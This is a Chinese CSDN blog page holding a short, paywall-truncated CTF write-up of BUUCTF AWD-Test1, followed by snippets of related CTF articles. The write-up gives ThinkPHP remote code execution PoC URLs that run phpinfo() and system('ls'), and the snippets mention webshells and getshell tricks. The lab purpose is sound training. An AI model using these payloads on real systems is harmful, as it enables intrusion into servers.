BUUCTF AWD-Test1

最新推荐文章于 2025-04-24 11:24:08 发布
最新推荐文章于 2025-04-24 11:24:08 发布
阅读量1.1k 收藏 4
点赞数 5
CC 4.0 BY-SA版权
文章标签: 安全 PHP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_60905276/article/details/136380002
探索ThinkPHP框架漏洞,使用POC执行phpinfo和系统命令,获取flag。详述POC原理和应用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开靶场是这个有些简陋的界面。

随便点点,找到这个东西。

看到ThinkPHP,思路瞬间清晰,老熟人了。这个就是ThinkPHP漏洞。根据版本我们去找一下poc。

/index.php/?s=Index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

成功打开phpinfo界面。

查看目录

/index.php/?s=Index/\think\View/display&content="<?><?php%20system(%27ls%20/../%27);?>&data=1

最低0.47元/天 解锁文章

200万优质内容无限畅学
BUUCTF全题解目录(一)
qq_42812036的博客
02-13 3814
web [HCTF 2018]WarmUp 全解:https://www.jianshu.com/p/1c2998973197 PHP 代码审计 phpmyadmin 4.8.1任意文件包含 [强网杯 2019]随便注 比赛web题全解:https://www.jianshu.com/p/db6e2576b674 fuzz一下,过滤规则得出,然后 show tables =>得表名 show...
AWD-Test2
shinygod的博客
04-07 3304
00x1-eval后门 先用D盾扫一波 00x2-日志包含 原理: `log1.php``会把我们的请求以及其他的一些信息写进根目录下的log.php中。 然后我们进入log.php时,就会解析我们的shell了。 也就是有POST或者GET传参的地方,就能getshell 在任意位置添加一句话马,然后在/log.php,getshell 或者… 00x3-ping 在user.php中的ping,可以用管道来getflag 漏洞引发顺序: index.php中的$c值在function.p
BUUCTFAWD-Test1全网最详细WP
最新发布
siyue_secret的博客
04-24 307
哈哈,很明显的提示,对应着挖洞思路中的步骤。cat /flag成功拿到flag!,也能成功获得flag。
buuctf-AWD-测试1
m0_62008601的博客
08-03 3059
thinkphp漏洞复现/ssh远程登录
buuctf刷题(一)
CHAWUCIREN1的博客
07-26 259
test_your_nc idapro反编译一下,发现直接就system("/bin/sh"); 这个直接用nc连一下,然后cat flag rip 老规矩,checksec一下, file 一下,64位, 扔进ida里面 发现shell,应该是个栈溢出 查看栈空间, shell地址 构造payload=b’A’+p64(0x401186) exp warmup_csaw_2016 1 运行一下 老规矩 checksec 一下 啥保护都没开 丢ida里面 sprintf后面的函数点击进
test1
GP0000968523的专栏
11-09 355
tr
[BUUCTF-pwn] xm_2019_awd_pwn1
weixin_52640415的博客
12-21 364
乍一看以为这题有多简单,直接给个溢出,还没有canary ssize_t vuln() { char buf[32]; // [rsp+0h] [rbp-20h] BYREF setbuf(stdin, buf); return read(0, buf, 0x100uLL); } 再一看就有点意思了: got表就两项 .got.plt:0000000000601000 _GLOBAL_OFFSET_TABLE_ dq offset _DYNAMIC .got.plt:0000000
buuctf AWD-Test1
02-21
### BUUCTF AWD-Test1 题目解析 在BUUCTF AWD-Test1比赛中,参与者面对的是一个典型的攻防兼备(Attack and Defense, AWD)类型的挑战。这类竞赛不仅考验参赛者的攻击技巧,也强调防御能力的重要性。 #### 初始...
BUUCTF - Basic
weixin_39505091的博客
07-06 1324
XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件和代码,造成任意文件读取、命令执行、内网端口扫描、攻击内网网站、发起Dos攻击等危害。发现有个 ctftraining 数据库,查找该数据库下的表,果然找到了有个 flag表,该表里有个flag字段。文件上传漏洞,上传一个php一句话木马文件,返回了文件的访问路径,再用蚁剑连接,即可在根目录找到flag。2. 本来这样是没啥办法的,但是我们访问这个木马文件,发现这个文件其实是被执行了,输出了 hello;
Bugku S3 AWD排位赛-1 pwn
z1r0的博客
07-31 1335
利用格式化漏洞改a64l为system,v4传入/bin/sh即可getshell。因为s只能32,所以偏移可以采用gdb调试出来。
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
CTF-AWD-WEB AWD 模式下的WEB试题仓库 上传一些参加过的CTF线下赛AWD模式的WEB试题等
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
CTF-AWD 训练平台 [TOC] 项目简介 一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py web_chinaz 10 web_chinaz 为应用文件名称,10表示要生成的队伍数量 start.py python start.py 10 启动10个实例,以及check和flag服务。 stop_clean.py python stop_clean.py 暂停所有服务,并删除临时文件 注意,这里会删除所有现运行的容器,请谨慎使用。 pass.txt 存储队伍用户名密码,以及ssh、web端口 team01 ctf:308d66 ssh:2201 port:8801 team02 ctf:024b1d ssh:2202 po
BUUCTF百题刷题总结(一)
qwzf
09-14 2224
前言 最近打算开始刷BUU的Web题了,之前已经刷过一些,有的总结了,有的没有总结。总结过的这里只写之前总结的链接;没总结的,原因是当时感觉有点简单,这里简单写下考察知识点和解题思路。 新刷的Web题,会认真总结。本篇主要记录之前刷的题,BUUCTF刷题系列持续更新(SQL注入题单独记录)! 0x01 [HCTF 2018]WarmUp 考点:PHP代码审计+绕过自定义函数+文件包含 查看源代码,发现source.php,访问发现源码 <?php highlight_file(__FILE_
sqltest 1 buu
m0_50967960的博客
05-02 795
wireshark查看流量包 最近刚学了wireshark,使用起来才发现学废了???? 可能为bool盲注的数据包 导出http对象 整理得:102 108 97 103 123 52 55 101 100 98 56 51 48 48 101 100 53 102 57 98 50 56 102 99 53 52 98 48 100 48 57 101 99 100 101 102 55 125 substr函数 例如: select substr(‘abcdefg’,3,4) from
BUUCTF刷题十一道(06)
qq_45837896的博客
07-29 1884
BUUCTF刷题十一道
bugku--- 比赛真题1-3
qq_51802152的博客
12-15 563
bugku--- 比赛真题1-3
记录一次bugku AWD模拟赛
weixin_52365980的博客
11-07 1103
使用Antsward进行连接,成功获取到flag(这里只要在文件上传时过滤文件后缀名即可做到加固的作用,咱就是说这里就不建议上waf,这里会直接导致网站访问不到,踩雷了扣100分)这里找到一个文件上传点,可以传入一句话木马进行getshell,这里使用pht或者phar后缀进行上传以免被waf检测到删除。3.审计并没有什么结果,继续分析网站,发现网站框架为Subrion CMS v 4.1.4,找到该版本可以利用的漏洞。5.这里还发现一个漏洞,在/game中有一个文件包含漏洞。1.扫描局域网内存活主机。
awd攻防训练赛1
soldi_er的博客
05-28 3572
文章目录前言1.服务器运维2.攻击环节探测其他队伍主机攻击总结反思 前言   学校战队的几个人简单尝试了一下bugku的线上awd攻防赛,做个记录。 1.服务器运维   下载Web源码:xftp连接192-168-1-247.pvp254.bugku.cn/,在/var/www/html目录下有网站源代码.zip,下载。   连接服务器主机:ssh连接服务器,以team2身份在根目录下寻找主机上的flag文件。 find / -name "*flag*" 2.攻击环节 探测其他队伍主机   编写Pyt
BUUCTF bbys_tu_2016&&xm_2019_awd_pwn2
doudoudedi
01-23 1121
在家希望武汉的师傅们一切都好~~ bbys_tu_2016 这道有点没搞清额额flag文件是flag.txt是能control但是好像不能ROP也是能读到flag文件的就很简单了还有似乎文件没写好setbuf函数不会先出现io流 exp: #!/usr/bin/python2 from pwn import * local=0 if local==1: p=process('../binary/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值